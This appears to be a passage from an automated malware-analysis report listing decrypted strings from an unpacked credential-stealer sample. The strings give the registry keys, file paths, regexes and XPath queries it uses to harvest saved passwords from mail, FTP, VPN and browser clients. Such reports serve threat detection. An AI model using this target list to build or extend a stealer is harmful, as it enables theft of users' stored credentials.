                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </string>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <data>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </data>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: -convert xml1 -s -o "
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \fixed_keychain.xml"
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Microsoft\Protect\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: credential
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: QQ Browser
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Tencent\QQBrowser\User Data
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Default\EncryptedStorage
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Profile
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \EncryptedStorage
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: entries
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: category
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: str3
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: str2
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: blob0
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: password_value
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: IncrediMail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: PopPassword
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SmtpPassword
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\IncrediMail\Identities\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Accounts_New
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: PopPassword
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SmtpPassword
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SmtpServer
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: EmailAddress
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Eudora
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\Qualcomm\Eudora\CommandLine\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: current
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Settings
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SavePasswordText
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Settings
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ReturnAddress
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Falkon Browser
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \falkon\profiles\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: profiles.ini
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: startProfile=([A-z0-9\/\.\"]+)
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: profiles.ini
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \browsedata.db
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: autofill
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ClawsMail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Claws-mail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \clawsrc
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \clawsrc
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: passkey0
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: master_passphrase_salt=(.+)
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: master_passphrase_pbkdf2_rounds=(.+)
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \accountrc
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: smtp_server
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: address
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: account
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \passwordstorerc
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {(.*),(.*)}(.*)
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Flock Browser
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: APPDATA
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Flock\Browser\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: signons3.txt
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: DynDns
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ALLUSERSPROFILE
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Dyn\Updater\config.dyndns
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: username=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: password=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: https://account.dyn.com/
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: t6KzXhCh
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ALLUSERSPROFILE
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Dyn\Updater\daemon.cfg
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: global
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: accounts
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: account.
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: username
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: account.
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Psi/Psi+
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: name
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Psi/Psi+
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: APPDATA
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Psi\profiles
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: APPDATA
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Psi+\profiles
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \accounts.xml
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \accounts.xml
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: OpenVPN
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\OpenVPN-GUI\configs
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\OpenVPN-GUI\configs
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\OpenVPN-GUI\configs\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: username
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: auth-data
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: entropy
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: USERPROFILE
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \OpenVPN\config\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: remote
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: remote
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: NordVPN
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: NordVPN
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: NordVpn.exe*
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: user.config
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: //setting[@name='Username']/value
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: //setting[@name='Password']/value
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: NordVPN
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Private Internet Access
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: %ProgramW6432%
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Private Internet Access\data
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Private Internet Access\data
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \account.json
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: .*"username":"(.*?)"
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: .*"password":"(.*?)"
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Private Internet Access
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: privateinternetaccess.com
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: FileZilla
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: APPDATA
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \FileZilla\recentservers.xml
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: APPDATA
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \FileZilla\recentservers.xml
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <Server>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <Host>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <Host>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </Host>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <Port>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </Port>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <User>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <User>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </User>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <Pass encoding="base64">
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <Pass encoding="base64">
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </Pass>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <Pass>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <Pass encoding="base64">
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </Pass>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: CoreFTP
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SOFTWARE\FTPWare\COREFTP\Sites
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: User
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Host
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Port
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: hdfzpysvpzimorhk
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: WinSCP
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: HostName
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: UserName
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: PublicKeyFile
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: PortNumber
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: [PRIVATE KEY LOCATION: "{0}"]
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: WinSCP
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ABCDEF
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Flash FXP
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: port
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: user
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: pass
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: quick.dat
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Sites.dat
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \FlashFXP\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \FlashFXP\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: FTP Navigator
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SystemDrive
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \FTP Navigator\Ftplist.txt
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Server
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: No Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: User
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SmartFTP
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: APPDATA
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: WS_FTP
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: appdata
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: HOST
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: PWD=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: PWD=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: FtpCommander
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SystemDrive
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SystemDrive
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SystemDrive
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \cftp\Ftplist.txt
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ;Password=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ;User=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ;Server=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ;Port=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ;Port=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ;Password=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ;User=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ;Anonymous=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: FTPGetter
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \FTPGetter\servers.xml
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <server>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <server_ip>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <server_ip>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </server_ip>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <server_port>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </server_port>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <server_user_name>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <server_user_name>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </server_user_name>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <server_user_password>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <server_user_password>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </server_user_password>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: FTPGetter
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: The Bat!
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: appdata
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \The Bat!
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Account.CFN
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Account.CFN
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Becky!
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: DataDir
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Folder.lst
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Mailbox.ini
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Account
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: PassWd
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Account
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SMTPServer
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Account
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: MailAddress
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Becky!
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Outlook
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Email
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: IMAP Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: POP3 Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: HTTP Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SMTP Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Email
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Email
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Email
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: IMAP Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: POP3 Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: HTTP Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SMTP Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Server
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Windows Mail App
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\Microsoft\ActiveSync\Partners
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Email
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Server
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SchemaId
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: pResourceElement
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: pIdentityElement
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: pPackageSid
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: pAuthenticatorElement
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: syncpassword
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: mailoutgoing
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: FoxMail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Executable
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: FoxmailPath
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Storage\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Storage\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \mail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \mail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Accounts\Account.rec0
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Accounts\Account.rec0
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Account.stg
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Account.stg
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: POP3Host
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SMTPHost
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: IncomingServer
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Account
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: MailAddress
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: POP3Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Opera Mail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: opera:
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: PocoMail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: appdata
